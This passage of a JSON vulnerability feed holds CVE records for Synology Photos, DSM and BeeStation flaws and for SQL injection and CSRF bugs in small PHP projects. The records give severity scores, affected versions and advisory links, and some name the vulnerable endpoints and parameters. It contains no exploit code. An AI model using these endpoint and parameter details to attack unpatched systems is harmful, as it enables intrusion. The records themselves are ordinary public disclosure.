(PWN2OWN 2024)", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Improper neutralization of special elements used in a command ('Command Injection') vulnerability in Task Manager component in Synology BeePhotos before 1.0.2-10026 and 1.1.0-10053 and Synology Photos before 1.6.2-0720 and 1.7.0-0795 allows remote attackers to execute arbitrary code via unspecified vectors." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:synology:photos:*:*:*:*:*:diskstation_manager:*:*", "versionEndExcluding" : "1.6.2-0720", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:synology:diskstation_manager:7.2:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:synology:beephotos:*:*:*:*:*:beestation_os:*:*", "versionEndExcluding" : "1.1.0-10053", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:synology:beestation_os:1.1:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:synology:beephotos:*:*:*:*:*:beestation_os:*:*", "versionEndExcluding" : "1.0.2-10026", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:synology:beestation_os:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:synology:photos:*:*:*:*:*:diskstation_manager:*:*", "versionEndExcluding" : "1.7.0-0795", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:synology:diskstation_manager:7.2.2:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-11-15T11:15Z", "lastModifiedDate" : "2025-04-10T20:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10444", "ASSIGNER" : "security@synology.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-295" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.synology.com/en-global/security/advisory/Synology_SA_25_01", "name" : "Synology-SA-25:01 DSM (PWN2OWN 2024)", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Improper certificate validation vulnerability in the LDAP utilities in Synology DiskStation Manager (DSM) before 7.1.1-42962-8, 7.2.1-69057-7 and 7.2.2-72806-3 allows man-in-the-middle attackers to hijack the authentication of administrators via unspecified vectors." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-03-19T02:15Z", "lastModifiedDate" : "2025-03-19T02:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10445", "ASSIGNER" : "security@synology.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.synology.com/en-global/security/advisory/Synology_SA_24_20", "name" : "Synology-SA-24:20 DSM (PWN2OWN 2024)", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.synology.com/en-global/security/advisory/Synology_SA_24_23", "name" : "Synology-SA-24:23 BeeStation (PWN2OWN 2024)", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Improper certificate validation vulnerability in the update functionality in Synology BeeStation OS (BSM) before 1.1-65374 and Synology DiskStation Manager (DSM) before 6.2.4-25556-8, 7.1.1-42962-7, 7.2-64570-4, 7.2.1-69057-6 and 7.2.2-72806-1 allow remote attackers to write limited files via unspecified vectors." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-03-19T02:15Z", "lastModifiedDate" : "2025-03-27T09:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10446", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jadu101/CVE/blob/main/project_worlds_online_time_table_generator_add_department_sqli.md", "name" : "https://github.com/jadu101/CVE/blob/main/project_worlds_online_time_table_generator_add_department_sqli.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.282006", "name" : "VDB-282006 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.282006", "name" : "VDB-282006 | Project Worlds Online Time Table Generator admindashboard.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.432371", "name" : "Submit #432371 | Project Worlds Online Time Table Generator 1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical has been found in Project Worlds Online Time Table Generator 1.0. Affected is an unknown function of the file /timetable/admin/admindashboard.php?info=add_course. The manipulation of the argument c leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:projectworlds:online_time_table_generator:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-28T12:15Z", "lastModifiedDate" : "2024-11-01T16:39Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10447", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jadu101/CVE/blob/main/project_worlds_online_time_table_generator_update_profile_sqli.md", "name" : "https://github.com/jadu101/CVE/blob/main/project_worlds_online_time_table_generator_update_profile_sqli.md", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.282007", "name" : "VDB-282007 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.282007", "name" : "VDB-282007 | Project Worlds Online Time Table Generator staffdashboard.php sql injection", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?submit.432372", "name" : "Submit #432372 | Project Worlds Online Time Table Generator 1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical was found in Project Worlds Online Time Table Generator 1.0. Affected by this vulnerability is an unknown functionality of the file /timetable/staff/staffdashboard.php?info=updateprofile. The manipulation of the argument n leads to sql injection. The attack can be launched remotely." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:projectworlds:online_time_table_generator:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-28T13:15Z", "lastModifiedDate" : "2024-10-31T01:23Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10448", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-352" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?id.282008", "name" : "VDB-282008 | code-projects Blood Bank Management System delete.php cross-site request forgery", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.282008", "name" : "VDB-282008 | CTI Indicators (IOB, IOC, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.432501", "name" : "Submit #432501 | code-projects Blood Bank Management System 1 Cross-Site Request Forgery", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://github.com/bevennyamande/bloodbank_delete_csrf_attack", "name" : "https://github.com/bevennyamande/bloodbank_delete_csrf_attack", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://code-projects.org/", "name" : "https://code-projects.org/", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as problematic, has been found in code-projects Blood Bank Management System 1.0. Affected by this issue is some unknown functionality of the file /file/delete.php. The manipulation of the argument bid leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Other endpoints might be affected as well." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:fabianros:blood_bank_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "HIGH", "availabilityImpact" : "NONE", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-10-28T14:15Z", "lastModifiedDate" : "2024-11-01T18:26Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10449", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/ppp-src/CVE/issues/25", "name" : "https://github.com/ppp-src/CVE/issues/25", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.282009", "name" : "VDB-282009 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?